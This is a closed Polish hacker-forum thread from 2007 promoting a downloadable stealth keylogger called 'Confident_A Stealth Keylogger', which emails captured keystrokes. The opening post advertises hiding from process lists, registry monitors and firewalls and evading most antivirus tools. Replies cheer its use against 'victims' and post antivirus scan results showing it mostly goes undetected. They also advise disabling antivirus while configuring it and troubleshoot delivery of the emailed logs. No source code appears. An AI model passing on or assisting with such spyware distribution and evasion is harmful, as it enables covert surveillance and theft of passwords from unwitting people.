Confident_A Stealth Keylogger

Status
Zamknięty.

astRX

Użytkownik
Dołączył
Maj 17, 2005
Posty
188
Rasowy keylogger bez zbędnych dupereli -> logowanie + mail

Zalety:
- niewidzialny w procesach
- niewykrywalny przez HijackThis
- niewidzialny dla wszystkich strażników rejestru
- firewalls bypassing
- szyfrowany server ~ 107 kb


Po uruchomieniu servera keylogger próbuje sie aktywować, w niektórych przypadkach (w zależności od zainstalowanego softu) aktywuje sie po restarcie maszyny.
Po aktywacji keyloggera w wersji publicznej na słabszych maszynach odczucie spowolnienia systemu...
Na dzień publikacji v.public niewykrywalne przez większość programów antywirusowych; rozszerzona proaktywna KAV wychwytuje wyłapywanie klawiszy

Special greetz for Wojass
<


przykładowa konfiguracja
DOWNLOAD
 

Kery2

Użytkownik
Dołączył
Lipiec 13, 2007
Posty
6
Test

Zaraz przetestuje :nauka:, Ciekawe, konfiguracja bardzo prosta jak napisałeś bez zbędnych dupereli ;] Jednak powiedz jeszcze jak dokladnei dziala, koleś otwiera server. po resecie lub nei keylogger sie instaluje i od tej chwili zapisuje i wysyla wszystko co ofiara napisze?
 

Kery2

Użytkownik
Dołączył
Lipiec 13, 2007
Posty
6
.

Keylogger Działa znakomicie, świetna robota astRX!! I bardzo dobrze że nie ma zbędnych dupereli właśnie czegoś takiego szukałem. Gratuluje!! :gool:

Ps. Najnowsza wersja Av go nie wykrywa
<
k:
 

VatrasPL

Użytkownik
Dołączył
Lipiec 14, 2007
Posty
2
no zaje****** komp mi sie zaczoł chrzanic jak to przez przypadek uruchomiłem ;/ a nie ma jakiegos ręcznego sposobu?
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848
Originally posted by VatrasPL
no zaje****** komp mi sie zaczoł chrzanic jak to przez przypadek uruchomiłem ;/ a nie ma jakiegos ręcznego sposobu?

jest w paczce z keyloggerem.
 

halset110

Użytkownik
Dołączył
Lipiec 19, 2007
Posty
3
A-Squared
Found nothing
AntiVir
Found HEUR/Malware
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found PSW.Generic4.XZD
BitDefender
Found Trojan.Spy.Keylogger.BJ
ClamAV
Found nothing
CPsecure
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found Trojan-Spy.Win32.KeyLogger.ng
Fortinet
Found nothing
Kaspersky Anti-Virus
Found Trojan-Spy.Win32.KeyLogger.ng
NOD32
Found nothing
Norman Virus Control
Found nothing
Panda Antivirus
Found nothing
Rising Antivirus
Found nothing
Sophos Antivirus
Found nothing
VirusBuster
Found Trojan.DR.Agent.IJT
VBA32
Found nothing



szacunek dla autora

[ Dodano: 20-07-2007, 03:11 ]
jak zmienić serwerowi ksywę
 

Gebels

Użytkownik
Dołączył
Lipiec 23, 2007
Posty
57
Jestem w tym kompletnie zielony więc mam takie pytanie... Czy ten keylogger nadal będzie wysyłał logi na e-mail jak ofiara skasuje "zainfekowany" plik ? Pytam bo po co komu nie działający plik, więc bardzo prawdopodobne, że zostanie skasowany.
 

swir1

Użytkownik
Dołączył
Lipiec 25, 2007
Posty
9
hmmm ustawiam server, wlaczam w celu przetestowania i ...zuzycia procka 100% przez "explorer" :/ Dwa razy probowalem ustawiac i ciagle to samo, a kompa az tak slabego nie mam...Athlon 3000+ i 512MB ram + win XP. Co robic?
 

pioncz

Użytkownik
Dołączył
Marzec 29, 2007
Posty
130
mi ten kl nie chce dzialac...
juz mam ich 5 na kompie i zaden nie wyslal maila a powinien po minucie
prosze o pomoc
 

swir1

Użytkownik
Dołączył
Lipiec 25, 2007
Posty
9
...sprawdzalem jeszcze na drugim kompie i tez to samo...zuzycie procka na 100%..system zwalnia niemilosiernie...maile przychodza tyle ze puste :/ ktos pomoze ??
 

evolucja

Użytkownik
Dołączył
Czerwiec 11, 2007
Posty
110
Originally posted by RXr2cc
Mam pytanie dlaczego każdy Keylogger który ściągam ma keyloggera w konfiguratorze... Ardamax, Perfect, ten Confident, VSK itd... Czy w tym jest wirus czy to tylko o tak bo to keylogger który po wygenerowaniu serwera zapisuje logi
<
.
To konfigurator, który generuje serwer keyloggera. Na czas konfiguracji wyłącz AV i FW.

Originally posted by pioncz+--><div class='quotetop'>CYTAT(pioncz)</div>
mi ten kl nie chce dzialac...
juz mam ich 5 na kompie i zaden nie wyslal maila a powinien po minucie
prosze o pomoc[/b]
Nie możesz mieć 5. Za każdym razem musisz usuwać poprzedniego... Może źle skonfigurowałeś?

btw. Czy naprawdę chcesz mieć 1440 maili dziennie?

Originally posted by swir@
...sprawdzalem jeszcze na drugim kompie i tez to samo...zuzycie procka na 100%..system zwalnia niemilosiernie...maile przychodza tyle ze puste :/ ktos pomoze ??

Autor napisał:
<!--QuoteBegin-autor programu

Po aktywacji keyloggera w wersji publicznej na słabszych maszynach odczucie spowolnienia systemu...
 
Status
Zamknięty.
Do góry Bottom